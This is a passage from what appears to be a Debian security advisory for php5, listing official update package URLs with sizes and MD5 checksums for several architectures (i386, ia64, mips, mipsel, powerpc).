  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    17250 dc1ff3ba01207cb9935fa793d98465d8
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    18408 63fb5494ad0837086594aec56bdd837b
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    16470 c1cdb76c8c5669e16cd5f773116bf35a
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    24476 6d29507def57e1bbf336ccf2db183a75
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:  2397258 4da8cce3353e34b9427f5f18938d549c
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    11302 71baa3c67592f6e5cc0360ebcf907e0c
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:     5054 0143af75361f1ac5c3e20bad8d4242ac
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    33412 efd84ace9c075cab659a6897e04cb647
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    12260 1b786fb5d8585226551ee8d3619d18de
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    12834 c21f37ffb8f0894c3ca8e153c2180f4a
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    36452 4329727421bd7c2cfa092c89ed489c3f
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:     5048 0ab324efa3780976ecaf94f1aeafea6c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:  2397538 a8fd72cee1abafb49dc54e4ea8403256
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    11314 f9f0d2efff045b2a4c5346dd445ea75e
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    17248 27efa63ee7257ccde26fdeda351e396c
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    64912 b5e0f0a696e0a3f24c6f2c3d6846ec39
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:  2412918 ebb3b3b86760644eea0dd62a26745276
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    50624 adf0cf41b4cbc497ad05ecd2d3cd3892
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:   341950 6be2360d1f51c6c07ff97f5692f05389
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:  4756240 332656ab184d42b210376a03df1436b5
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:     4758 433af1ec1cb7f966c83fe24e621ac289
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    16476 be1e7689f34a2fe5bd1ac215eb600c2e
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    24472 b90be0869dedfc4394ae45cc1712a386
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    18400 bf96d303ff9b97614490e257042b859e
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:   342098 db86856da9726136cf47419ef087ac65
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:     8626 32d0409d8278838c059a50f15c05396a
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:  2412444 6b05b12a791466216f18f53378603f66
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    12838 2a3e52a6005a8c0d2501ef73c0c3ceae
  http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    44140 cc09302e6e47c6eba2f397a96c63ab5a
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:  2412774 6ce94a9b0a6dcc023f8b06bb6ce3c5ef

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:  6397784 73dff6ed22bfa6cc5759ed4fb38b6d27
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    95630 969755e8020136d912c586675410b0f6
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    76590 147304358e6e13c41b410daa68515d7d
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    48312 2b5945dc151f65ec3e8e6b7c57c3a980
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    17762 f00b19d49b08bcae259bfdf68a862acd
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    15432 550d2d43da780dc7cd0609059200af6c
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:     6488 f68c83086ca16aa61a78885e1f9a6a08
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:   342036 cb99d71765e36bb658aad0874bb683c7
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    34388 14c58b4205ef46f07f806559ed8db50f
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    54514 a109cd07c393cddec2c3725a1113ce65
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    17554 78a08884e87c6a8e0d375d6520d4dc55
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    50162 cb3332061f349f07106f1a8b7f1b00fd
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:  3271182 93168846e606d80cb3bda8ab310107f3
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:   235074 712c5b1aca804a77cebf5e063a7ec889
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:  3270024 660749c62de37b66629f904eceefd720
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    50646 958f4d2c0944069312dea11bc6c2a7e5
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    34392 7409622d4643867888253a3ab768f8fa
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:     6122 d848d21d8bd5341a36325f88cf687f49
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    54666 155ac193949554b9adfcb7f3e30b3f47
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    48320 11c715c5586adf7643b7cb8f3054a8ad
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    54514 c5a1d767cebc78dacd0d49d356034edd
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    17764 6a1ebceb96b098b0438e26a47a6a05e9
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:  3270558 31ccb9c80e32093fccc5f7960086a294
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    50156 29d9896783363b2a1e6cce3d5bd5e453
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:   234968 574f1234c28b8faf0a28ad91479997f6
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    25084 2299caf83e641d5a4a28b58d6d69627d
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:  3220368 74b4f0939600a0635bf2681df7b0b44a
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    27142 a33ffaa6e5b42836ead783d65c0e6c0e
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    24858 f09ea3d5d9bb5ad55f10cb66dd4603d0
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    50656 207e54ebad3fbe865c18d89fb39d8eec
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:  3270786 923384c6e57d80807fe17dc6fe2bc25c
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    12004 ced93ac701c4a9e2caa6bcf682f2cbaf
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    54668 e0282faabbfc912f5521dbe4be800133
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    25080 69b66b37dd69b0372ec5ad50f7ec8c25
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    24862 61aa341cf6fdd4f35c45a6a333bd7453
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:  6396860 f01ca9b6d02642002dbe6ef20623d0e3
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:  3221634 9fd85e0c9e5e7b2d1a423a7b5335aafe
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    95614 7acf56ae45e6f4ddf1176acff42d1efa
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:    12010 85b5643639bce577485adf8558519b07
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    27138 c6d65a350282e784564e152f35136e46
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:     6498 8182f460230240402c387c6a560c9402
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    15432 14c3fe1caf8177ae41d793e73132a9af
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_ia64.deb
    Size/MD5 checksum:     6124 4c853db5f47a1af93bb7a0178cdb7372
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:   342044 01369f913f34ed1004f9d7c5b41566b3
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    17552 76bfd161c4f3998e7f3426c75809e52b
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_ia64.deb
    Size/MD5 checksum:    76592 d1675bcb173c07393c8e6978d0533c98

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:  4886552 fdacbf13158601c6e396a1a1c58747ef
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    18484 896a72a9e6f091a5cab4416e40b9b2c8
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    17306 8b2f4d54b7095a8ab738597ff299567c
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    35588 33d6aefad55970aa5dd25413ff413f7a
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:     5244 7fc5c13f6ec60f78761b0cd0b90d7979
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    35132 2b48b354d2230f734d9c86e84ab10cd7
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:     4900 588d1a49f3b5db33e280b34039a6a241
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    12210 ff490058759d0c0036abfb826ca401b7
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    15722 9882b273088192068de9417aae5a7c84
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    49470 1e4fe5d24559245351410f780eb546ca
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    12460 4adb8cca7a214cfcbbef73ad00ee83ff
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:  2457442 62a300381827ff22616fc342710b9c79
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:     8260 faa243584720f6b8e949d07c622d855c
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    63872 a65478388bcdf4adb3073910199ac449
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:  2485474 63006e452be7ff16556eb8dad83d8e96
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    11334 62846c1108f2d94230bd57c37413b94f
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    31640 b9c75aac789241aa1479ce6e953da597
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    33156 66407cc2ba1262a1d620afa2fac28cb7
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:  2486004 f4f79d5a59a84339193d3bb1792481fa
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:   215690 5b34b952dd8842fcb4c94371104a583b
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    23286 125b4888c1325def8caa251a2f661b6d
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:   342158 5d2ea96268ce79fe9e7ecd5c7c84020b
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_mips.deb
    Size/MD5 checksum:    32666 487a97250199d6aabe81803fbfac31db

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    12136 abb2bb3df3f2c2abc3684640cbfc0538
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    17250 c6cd0e428bd107bed1c4da9f2674185d
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    15638 416e96cb18d25535576a23c726af5cbb
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    63400 cf9e66b0b875abfeb2f40c560454d4fb
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:   215110 20adfd638a7c5d0eb73af091f52db204
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:   342172 18bc83bffe3719845381e57bbbedc2fd
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    31584 cb93ea2a733f5b17f2743a73cdba394b
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    15640 6731f72daae0764b2a44e37daf56b66f
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:  2441468 a2f7cb80708bca0f6d1ee1afbb5b8aef
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:     8208 1324d9be3aa69da22a1bccbd6ba57875
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:  2442310 ce995db11e825960a8254bd62626876a
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    34928 b3716b8b438aeb3d2a43d189f82299e8
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    33088 dd32e149ad42842a4c26b2cb81352166
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    17254 9695ce42d92e2bf5f2657babc7454676
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    11262 1096263c5102d7f203d1cccd51321091
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:     5234 0bdc2e0e38573d5aebca10e3b4813fdc
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:     4898 135396b2d32c92e4c5d61a5201166d5d
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    23314 661eb58dec09d8eb87325ab3f25556cf
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:     8206 5d5c254cf651bd95c465b5fd5bd6d548
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    18460 7a745ace413bffa457f36f2e2a30beba
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:  4830564 8b7bc5eb47478c37f65b7ae7887acec1
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    18458 66c596ae06bbb35cb8b065bcb97d584b
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:  2431484 9531cc2f381779dbf517e59caeb56011
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    49400 9ccc013c11ba5202f3b92df976e13626
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:  2442976 892fe8b525fe2bd6680848b5f55a8f8f
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    12426 000024744d15ca435a4768ce91ef9e9f
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    32172 99aa9cf8b9a2171b9c89f6fc6bb7fd5a
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    32172 61369e34a951af721369b7b06bc5d761
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    12428 d4fe061c8e2fbb0f10b3764c9ae7fe97
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:  2442244 4ee8213ff6d517643325af8b31d422ca
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:  2432016 978356dc38a8ff3a69be83385a582cfc
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:   342178 c1d40fb12f9c126a914cf219f2eadd93
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:     5238 e410a362032bd3a0295f847f047f63ba
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    11262 d56663e21ea0e3022da2c1f6f774e0eb
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    23312 c169910ff8d2b1179289d353319f6350
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    34928 5aeda58d82e03a986afffd3f89d7da98
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:   215292 fa8b8aa5f6c283338b78db3f1551eaca
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    35562 7d2dbdf86cce1c8d6f9e47b04690b31c
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    31586 83624c7a1c3ca10329ebdb7b5e4186b9
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    35560 26bceb8862555cb0dbc18ffe1dcff315
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    33080 1c027dc4facee12c2aba3451ca9d76a1
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:     4896 6a19831c18e7b9ae25bf5d0819220f82
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_mipsel.deb
    Size/MD5 checksum:    49402 2857db4ff892f139a072d602244ac411
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    12138 652a60fb99aa9cee23788f8cc0eb5c82
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:    63406 2fc268c4da12dc3d7d3908933b8b724c
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_mipsel.deb
    Size/MD5 checksum:  4829450 af090273c9a156cbd578c5bc7e85bdd6

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:  2515848 7d04226243cd9d7fcb23e5527d2a1a97
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:  4898534 47eea0e50e929ca097d8b0c3f5d1b9b9
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:     6340 90ed951c8bda6b6dec685fbc222f7db2
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:     6342 15cbc2d9f41d8dfda6d9b3427488dcd9
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    37704 3dace1652d4abc5547bd71a0a13085f5
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    35990 0dbb065e3899716d1136ef1c260b8e3b
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    70370 669f61b096340d412b861e1e84a06f1b
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    37080 35f6a789eb308f4388417f8205ad94bb
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    20240 08683176020e81284970d4a42307b29c
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    10108 d7247ef4034bd770ea6bd9a74ce4a149
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    26752 d28e747fe74d94113008729934fb215e
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    70360 6d73762f1de824d0fe4570907c2e6dcd
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    13742 1d5272447a12a3b5ae8ae1464b5a8327
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    36312 c3dd3ac413f8fc96d984128c68cb5176
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    18450 5445e7d5724bdf8b31272d251e48f113
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    26756 f2e9d494bc59368e1b48f138fd7d0385
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:     6738 3d25461406747baa2cb21b04c429132b
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    20234 8644fcd82fa0a9e459724d2f88eb3a29
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:   218124 3c6ca3ffc4e443aff3f9cbebc6dba9a4
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:  2465196 2b6ca6219dc64ddd16197a456e2ef244
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    38012 1e6740a61bb44742bc67cb59c2dc277d
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    14738 41a3e6bef7d372bc3e1a6371786e0bbe
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    37084 6e350c2d70e7d33ec86e6938f2d5da95
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:  2516218 7dce78ce888f3e97421238d301506bba
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:   342058 29a5fd40376197a79fcef82f0a69cf4b
